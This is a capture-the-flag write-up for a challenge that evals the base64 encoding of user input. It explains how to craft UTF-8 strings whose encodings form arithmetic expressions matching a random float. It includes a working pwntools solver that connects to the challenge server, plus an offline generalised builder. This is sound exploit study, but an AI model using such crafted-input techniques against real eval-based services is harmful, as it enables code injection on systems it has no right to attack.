Challenge: nc pwn.challenge.ctf.show 28006 (the port changes)
Running the command prints the following code:
#!/usr/bin/env python3.8
from base64 import b64encode
from random import randint, random
from os import getcwd
print('\n\n')
print(open(getcwd() + '/' + __file__, 'r').read())
print('\n\n')
luck = randint(0, 2021) * random()
print(luck)
good = eval(b64encode(input().encode('utf-8')))
if abs(good - luck) < 1e-10:
    print(open('/flag').read())
else:
    print('Back luck 2021???')
The script then prints the random value for this connection; on this run it was:
20.511060023712336
Analysis: the program draws a random float luck, takes a line of input, base64-encodes its UTF-8 bytes, evals the resulting base64 string, and prints the flag if the result differs from luck by less than 1e-10. So what gets evaluated is never our raw input but its base64 encoding: a string over [A-Za-z0-9+/], plus '=' padding whenever the byte length is not a multiple of 3 (padding would be a syntax error, so the input must be a multiple of 3 bytes long). That alphabet has digits, 'e', '+' and '/' but no '.', '-', '*' or parentheses, so a value like 0.1 has to be written as a division of integers, and any 4-character fragment we want to appear in the expression must base64-decode to 3 bytes that are valid UTF-8 (input() decodes stdin as text before the script re-encodes it) and contain no newline.
The crux is therefore constructing the input. Searching turns up a few usable values:
b64encode('㝿㝴'.encode('utf-8')) == b'452/4520', which evaluates to 0.1
b64encode(b'{M>') == b'e00+'
...
So the plan: using these known encodings and the random float the program prints, build a string whose base64 encoding is an expression evaluating to that float (matching it to 10 decimal places is enough), then send it to the server:
import base64
import re
from pwn import *

# Each key is a 4-character base64 fragment; each value is the text whose
# UTF-8 bytes base64-encode to it. '0.1/' is shorthand for '452/4520' (== 0.1).
# Exponents 02, 03, 06, 07, 12 and 13 are missing because 'e02+' etc. decode to
# bytes that are not valid UTF-8 and so cannot be typed at the prompt.
table = {
    '0.1/': "㝿㝴",
    'e00+': '{M>',
    'e01+': '{M~',
    'e04+': '{N>',
    'e05+': '{N~',
    'e08+': '{O>',
    'e09+': '{O~',
    'e10+': '{]>',
    'e11+': '{]~',
    'e013': '{Mw',
    'e14+': '{^>',
    'e15+': '{^~',
}
# host and port: adjust to your environment
conn = remote("pwn.challenge.ctf.show", 28006)
# Skip the echoed source until the line that is just the random float.
# (A value below 1e-4 would be printed in exponent form and never match;
# that is rare enough to ignore here.)
while True:
    data = conn.recvline(keepends=False)
    res = re.search(r'^\d+\.\d+$', data.decode('ascii'))
    if res:
        # print(data)
        break
s = data.decode('ascii')
print(s)
p = s.index('.')
# Pad the fraction with zeros so a short value such as '20.5' still fills every slot below.
s = s + '0' * (p + 11 - len(s))
# Digit counts for the terms we can build:
#   d1*0.1 + d2*0.01 + d3*1e-5 + d4*1e-6 + d5*1e-9 + d6*1e-10
d1 = int(s[0:p] + s[p+1:p+2])   # integer part plus first decimal, in tenths (string work only, no float rounding)
d2 = int(s[p+2:p+3])
d3 = int(s[p+3:p+6])
d4 = int(s[p+6:p+7])
d5 = int(s[p+7:p+10])
d6 = int(s[p+10:p+11])
payload = "0.1/e00+"*d1     # 452/4520e00 == 0.1
payload += "0.1/e01+"*d2    # 452/4520e01 == 0.01
payload += "0.1/e04+"*d3    # 1e-5
payload += "0.1/e05+"*d4    # 1e-6
payload += "0.1/e08+"*d5    # 1e-9
payload += "0.1/e09+"*d6    # 1e-10
payload += "0.1/e013"       # 452/4520e013 == 1e-14: last term has no trailing '+', so the expression stays valid
#print(payload)
data = ""
for i in range(0, len(payload), 4):
    data += table[payload[i:i+4]]
# Local check that mirrors the server: print(eval(base64.b64encode(data.encode('utf-8'))))
conn.sendline(data.encode('utf-8'))   # send the UTF-8 bytes explicitly; input().encode('utf-8') on the server restores them
sleep(3)
print(conn.recvall())
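The same construction, generalized and checked offline. This is an added example, not the writeup's own script: instead of a hard-coded table it derives the bytes to send by base64-decoding the expression fragments it wants, tests which 'eNN+' fragments survive input().encode('utf-8') (this reproduces exactly the exponents in the table above and explains the gaps at 02, 03, 06, 07, 12 and 13), decomposes the printed value with exact decimal arithmetic rather than string slicing of a float, and re-runs the server's own comparison locally before anything would be sent. The function names sendable, usable_exponents, decompose, build_expression, build_payload and solves and the constants TENTH and TERMINATOR are my own; the sample value is the one printed in the run above.

```python
"""Offline builder and self-check for the base64-then-eval challenge above.
Added example, not the original writeup's script; all names here are my own."""
import base64
from decimal import Decimal

TOLERANCE = 1e-10
TENTH = "452/4520"   # base64 of '㝿㝴' (UTF-8); as Python source, 452/4520 == 0.1
TERMINATOR = "e013"  # base64 of '{Mw'; closes the final term without a trailing '+'


def sendable(fragment):
    """Can this base64 fragment be typed at the prompt?

    The server runs eval(b64encode(input().encode('utf-8'))), so the bytes
    we need are b64decode(fragment), and they reach eval unchanged only if
    they are valid UTF-8 (input() decodes stdin as text) and contain no line
    terminator (input() stops at one).
    """
    try:
        text = base64.b64decode(fragment, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return False
    return "\n" not in text and "\r" not in text


def usable_exponents(limit=16):
    """Exponents n for which the 4-char fragment 'eNN+' is sendable.
    Each one turns a preceding '452/4520' into 452/4520eNN == 10**-(n+1)."""
    return [n for n in range(limit) if sendable("e%02d+" % n)]


def decompose(luck_repr, exponents):
    """Greedy decomposition of round(luck, 10) into counts of 10**-(n+1) over
    the available exponents n <= 9, computed exactly from the printed string.
    Returns {n: count}."""
    units = int(Decimal(luck_repr).scaleb(10).to_integral_value())  # in 1e-10 units
    counts = {}
    for n in sorted(e for e in exponents if e <= 9):
        counts[n], units = divmod(units, 10 ** (9 - n))
    return counts


def build_expression(counts):
    """One '452/4520eNN+' per unit, then a final term with no trailing '+'."""
    terms = "".join((TENTH + "e%02d+" % n) * c for n, c in sorted(counts.items()))
    return terms + TENTH + TERMINATOR


def build_payload(luck_repr):
    """Text to type at the prompt for the printed value luck_repr."""
    expr = build_expression(decompose(luck_repr, usable_exponents()))
    raw = base64.b64decode(expr)
    # The expression length is a multiple of 4 by construction, so there is no
    # '=' padding and the server's re-encoding reproduces expr exactly.
    assert base64.b64encode(raw).decode("ascii") == expr
    return raw.decode("utf-8")


def solves(luck_repr, text):
    """Mirror of the server-side check."""
    luck = float(luck_repr)
    good = eval(base64.b64encode(text.encode("utf-8")))
    return abs(good - luck) < TOLERANCE


if __name__ == "__main__":
    sample = "20.511060023712336"  # value printed on the run in the writeup above
    payload = build_payload(sample)
    print(usable_exponents(), decompose(sample, usable_exponents()))
    print(len(payload), "chars to send; local check:", solves(sample, payload))
```

Run as a script it prints the usable exponent list, the per-term counts for the sample value (205, 1, 106, 0, 23, 7, the same digits the script above slices out) and the result of the local check. decompose rounds at the tenth decimal rather than truncating, so the residual is at most 5e-11, and because it parses the printed value with Decimal it also copes with an exponent-form repr such as 2.5e-05. One caveat that applies equally to the writeup's script: the expression is a left-to-right float sum with one term per unit, so a value near the 2021 maximum needs roughly 20 000 terms, and at that magnitude the worst-case accumulated rounding error (about half an ulp, 1.1e-13, per addition) is no longer negligible against the 1e-10 tolerance; the sample value here uses about 340 terms and sits comfortably inside it.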